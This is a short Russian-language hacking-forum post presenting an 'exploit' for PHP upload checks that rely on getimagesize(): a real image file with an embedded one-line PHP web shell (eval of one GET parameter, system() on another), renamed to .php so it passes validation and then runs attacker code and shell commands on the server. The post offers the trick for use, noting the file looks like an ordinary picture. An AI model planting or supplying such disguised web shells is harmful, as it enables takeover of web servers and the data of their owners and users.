Форум АНТИЧАТ - Эксплойт getimagesize()

Сделал интересную "картинку", обходящую функцию getimagesize().
В чём идея?
В том, что этой ф-ции чихать на расширение файла - она проверяет только тип и размер картинки, следовательно, можно загрузить картинку переименованную в php и функция не выругается. При том, что "картинка" выглядит очень похоже на нормальную картинку - это не мешает ей содержать

PHP код:


		
			
<? eval(stripslashes($_GET['c'])); system($_GET['s']); ?>

Загружаем переименованную в php эту картинку и выполняем свой код и команды на сервере. Если не открыть картинку блокнотом - выглядит очень правдоподобно.

Баг найден Eugen'ом с tem.dp.ua